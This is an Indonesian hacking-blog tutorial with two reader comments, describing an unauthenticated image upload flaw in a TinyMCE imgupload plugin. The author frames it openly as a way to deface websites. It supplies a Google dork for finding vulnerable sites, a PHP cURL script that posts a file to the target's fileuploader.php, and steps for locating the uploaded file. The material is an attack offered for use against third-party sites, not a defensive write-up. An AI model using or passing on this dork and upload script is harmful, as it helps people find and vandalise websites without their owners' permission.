Senin, 25 April 2016

Tinymce Images File Upload Vulnerable



      Hallo Gan , skarang sya mau share tutorial "Tinymce Images File Upload Vulnerable" , tdi sya mau nge deface , ehh malah dapat vuln ginian , entah sya yg temukan atau udah keduluan ama orang lain , tpi yg pastinya lumayan lah , buat nge deface :D

Klau gitu langsung aja ke TKP

Dork : inurl:/imgupload/ fileuploader.php (kembangin lgi yah vulnya banyak kok)

CSRF Xampp :

<?php
$uploadfile="foto.jpg";
$ch = curl_init("site.com/extlib/tinymce/plugins/imgupload/fileuploader.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
        array('qqfile'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

OK klau udah punya yg diatas , langsung aja cari target di pencarian google dengan mengunakan dork diatas :v

klau udah nemu kyak gini

http://site.com/(path)/extlib/tinymce/plugins/imgupload/

Langsung aja ubah kyak gini mas mbah

http://site.com/(path)/extlib/tinymce/plugins/imgupload/fileuploader.php

Kalau vuln gambarnya kyak gini



Ok langsung aja gunakan csrf xamppnya , nanti keliatan tempat uploadnya kok



Penting : File Yang bisa di upload cuman jpg , png ( php tidak mendukung )

Ok gitu aja gan , klau ada yg kurang vaham isi aja komentar di bwah yah gan :D

Thanks To : PhantomGhost - Sulawesi IT Sec

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://mobile.facebook.com/Mr3RR0R-1605930586394122/

Share this

2 Responses to "Tinymce Images File Upload Vulnerable"

  1. izin buat artikelnya ya kak :D
    sukses teruuss utk blog ini ^_^

    #Nuenomaru

    BalasHapus
  2. OK om , silahkan :v

    sukses terus jg buat blognya ;D

    #Mr.3RR0R

    BalasHapus